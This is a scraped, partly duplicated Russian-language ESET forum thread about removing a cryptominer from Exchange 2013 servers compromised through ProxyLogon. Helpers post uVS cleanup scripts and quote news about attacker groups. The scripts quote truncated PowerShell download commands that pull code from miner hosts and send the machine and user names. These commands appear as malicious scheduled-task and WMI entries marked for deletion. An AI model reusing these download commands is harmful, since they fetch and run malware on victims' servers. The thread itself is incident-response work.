Размещено 18.03.2021 04:44:05
| Цитата |
|---|
| Владимир Шариков написал: Еще вопрос. По той же проблеме. После этой бяки вот такое вылетает у пользователей (см. скриншот) |
это на клиентских системах происходит?
это на клиентских системах происходит?
Дорогие участники форума!
Наш форум переведен в режим работы "только для чтения", публикация новых тем и сообщений недоступна. Мы искренне благодарны вам за то, что были с нами, но пришло время двигаться дальше. После официального ухода компании ESET с российского рынка мы приступили к разработке новых продуктов вместе с новыми партнёрами. Приглашаем вас присоединиться к нашему новому форуму PRO32.
Мы более не являемся эксклюзивным дистрибьютором программных продуктов словацкого разработчика ESET в России, Республике Беларусь, Казахстане, Азербайджане, Узбекистане, Кыргызстане, Таджикистане, Туркменистане, Молдове, Грузии и Армении.
Купить и продлить лицензии ESET на нашем сайте больше нельзя.
Предлагаем вам попробовать новые продукты компании PRO32.
PRO32 — это технологичные решения, надежная защита от киберугроз и максимальная производительность устройств. Для действующих клиентов ESET мы предлагаем промокод на скидку в размере 15% — ESET15. Скопируйте его и после добавления товара в корзину, не забудьте его применить в корзине.
[ Закрыто] запуск майнера на серверах с MS Exchange 2013, ProxyLogon
это на клиентских системах происходит?
[ Закрыто] запуск майнера на серверах с MS Exchange 2013, ProxyLogon
Размещено 18.03.2021 04:37:50
| Цитата |
|---|
| Владимир Шариков написал: Что этот код делает? Стоит ли боятся "Последствий" этой бяки? |
я думаю стоит. эксплойт для ProxyLogon, по словам исследователей, мог использоваться в теч двух месяцев, до выхода мартовского обновления от Microsoft. (Возможно, была утечка эксплойта через поставщиков ПО, которые имеют ранний доступ к полученным сообщениям от исследователей)
| Цитата |
|---|
| После выхода официальных исправлений даже для неподдерживаемых версий уязвимые серверы Microsoft Exchange, напрямую открытые в Интернете, стали еще более горячей целью, поскольку злоумышленники могли перепроектировать обновления для создания эксплойта. ESET видела, что более 10 групп APT бросились атаковать непропатченные устройства. Многие из них занимались кибершпионажем, и в этот список входят Mikroceen и Tonto Team, но не все. Исследователи заметили активность группы, которую они называют «Opera» Cobalt Strike, которая использовала уязвимости Microsoft Exchange для установки продукта для тестирования на проникновение Cobalt Strike, который является обычным для некоторых известных кибергрупп Ransomware. В другом случае ESET заметил, что злоумышленник сбрасывает веб-оболочки, чтобы «установить так называемые бэкдоры IIS». Активность, приписываемая ботнету DLTMiner [1, 2], занимающемуся майнингом криптовалют, была замечена на серверах, которые были атакованы с помощью уязвимостей ProxyLogon. |
более подробно, здесь
[ Закрыто] запуск майнера на серверах с MS Exchange 2013, ProxyLogon
[ Закрыто] запуск майнера на серверах с MS Exchange 2013, ProxyLogon
Размещено 17.03.2021 18:20:14
| Цитата |
|---|
| Владимир Шариков написал: твик 39 что то найти не могу, найду.Еще вопрос. По той же проблеме. После этой бяки вот такое вылетает у пользователей (см. скриншот) |
uVS - дополнительно-твики. твик 39 в низу окна.
скриншот не увидел или не прикрепился
[ Закрыто] запуск майнера на серверах с MS Exchange 2013, ProxyLogon
[ Закрыто] запуск майнера на серверах с MS Exchange 2013, ProxyLogon
Размещено 17.03.2021 17:54:46
по второму серверу:
выполняем скрипт в uVS:
- скопировать содержимое кода в буфер обмена;
- стартуем uVS(start.exe), далее выбираем: текущий пользователь, меню - скрипты - выполнить скрипт из буфера обмена;
- закрываем все браузеры перед выполнением скрипта;
без перезагрузка, пишем о старых и новых проблемах.
------------
выполняем скрипт в uVS:
- скопировать содержимое кода в буфер обмена;
- стартуем uVS(start.exe), далее выбираем: текущий пользователь, меню - скрипты - выполнить скрипт из буфера обмена;
- закрываем все браузеры перед выполнением скрипта;
| Код |
|---|
;uVS v4.11.6 [http://dsrt.dyndns.org:8888]
;Target OS: NTv6.3
v400c
OFFSGNSAVE
;---------command-block---------
deltsk NET.WEBCLIENT).DOWNLOADDATA('HTTP://'+'DOWN.'+'SQLNETCAT.COM/A.JSP?_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT
deltsk NET.WEBCLIENT).DOWNLOADDATA('HTTP://'+'T.NET'+'CATKIT.COM/A.JSP?_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT
deltsk NET.WEBCLIENT).DOWNLOADDATA('HTTP://'+'T.SQL'+'NETCAT.COM/A.JSP?_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT
deltsk NET.WEBCLIENT).DOWNLOADSTRING('HTTP://'+'T.NET'+'CATKIT.COM/A.JSP?REP_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT
deltsk T.NETCATKIT.COM
delwmi NET.WEBCLIENT).DOWNLOADDATA('HTTP://'+'DOWN.'+'SQLNETCAT.COM/AA.JSP?_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT
delwmi NET.WEBCLIENT).DOWNLOADDATA('HTTP://'+'T.NET'+'CATKIT.COM/AA.JSP?_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT
delwmi NET.WEBCLIENT).DOWNLOADDATA('HTTP://'+'T.SQL'+'NETCAT.COM/AA.JSP?_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT
delwmi NET.WEBCLIENT).DOWNLOADSTRING('HTTP://'+'T.NET'+'CATKIT.COM/AA.JSP?REP_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT
apply
QUIT
|
без перезагрузка, пишем о старых и новых проблемах.
------------
[ Закрыто] запуск майнера на серверах с MS Exchange 2013, ProxyLogon
Размещено 17.03.2021 17:50:43
| Цитата | ||||
|---|---|---|---|---|
Владимир Шариков написал:
|
по второму серверу:
это нормальный софт?
C:\PROGRAM FILES\WIN-ACME\WACS.EXE
--RENEW --BASEURI "HTTPS://ACME-V02.API.LETSENCRYPT.ORG/"
[ Закрыто] запуск майнера на серверах с MS Exchange 2013, ProxyLogon
Размещено 17.03.2021 17:37:31
| Цитата |
|---|
| Владимир Шариков написал: Положу сюда сразу два образа двух серверов. |
можно и второй образ положить
[ Закрыто] запуск майнера на серверах с MS Exchange 2013, ProxyLogon
Размещено 17.03.2021 17:33:02
выполните в uVS скрипт для очистки задач, без перезагрузки системы: поправил скрипт
| Код |
|---|
;uVS v4.11.6 [http://dsrt.dyndns.org:8888]
;Target OS: NTv6.3
v400c
OFFSGNSAVE
;---------command-block---------
deltsk NET.WEBCLIENT).DOWNLOADDATA('HTTP://'+'DOWN.'+'SQLNETCAT.COM/A.JSP?_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT
deltsk NET.WEBCLIENT).DOWNLOADDATA('HTTP://'+'T.NET'+'CATKIT.COM/A.JSP?_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT
deltsk NET.WEBCLIENT).DOWNLOADDATA('HTTP://'+'T.SQL'+'NETCAT.COM/A.JSP?_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT
deltsk NET.WEBCLIENT).DOWNLOADSTRING('HTTP://'+'T.NET'+'CATKIT.COM/A.JSP?REP_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT
deltsk T.NETCATKIT.COM
delwmi NET.WEBCLIENT).DOWNLOADDATA('HTTP://'+'DOWN.'+'SQLNETCAT.COM/AA.JSP?_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT
delwmi NET.WEBCLIENT).DOWNLOADDATA('HTTP://'+'T.NET'+'CATKIT.COM/AA.JSP?_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT
delwmi NET.WEBCLIENT).DOWNLOADDATA('HTTP://'+'T.SQL'+'NETCAT.COM/AA.JSP?_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT
delwmi NET.WEBCLIENT).DOWNLOADSTRING('HTTP://'+'T.NET'+'CATKIT.COM/AA.JSP?REP_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT
apply
QUIT
|
[ Закрыто] запуск майнера на серверах с MS Exchange 2013, ProxyLogon
Размещено 17.03.2021 17:30:04
Экстренные исправления для недавно обнаруженных критических уязвимостей в почтовом сервере Microsoft Exchange появились не сразу, и у организаций было мало времени на подготовку до начала массовой эксплуатации.
Эта ошибка, получившая название ProxyLogon, использовалась в дикой природе еще до того, как Microsoft получила отчет об уязвимости, что дает злоумышленникам двухмесячный старт для взлома целей до появления обновлений безопасности.
Уязвимые серверы являются горячими целями для широкого спектра групп злоумышленников, которые ищут исходную точку опоры в сети для шпионажа или финансовых целей. Злоумышленники, Ransomware и майнинг криптовалют уже использовали ProxyLogon.
С выпущенными исправлениями и появлением кода эксплойта PoC в сети тысячи серверов Microsoft Exchange по всему миру продолжают оставаться уязвимыми, а количество атак по-прежнему вызывает тревогу.
Эта ошибка, получившая название ProxyLogon, использовалась в дикой природе еще до того, как Microsoft получила отчет об уязвимости, что дает злоумышленникам двухмесячный старт для взлома целей до появления обновлений безопасности.
Уязвимые серверы являются горячими целями для широкого спектра групп злоумышленников, которые ищут исходную точку опоры в сети для шпионажа или финансовых целей. Злоумышленники, Ransomware и майнинг криптовалют уже использовали ProxyLogon.
С выпущенными исправлениями и появлением кода эксплойта PoC в сети тысячи серверов Microsoft Exchange по всему миру продолжают оставаться уязвимыми, а количество атак по-прежнему вызывает тревогу.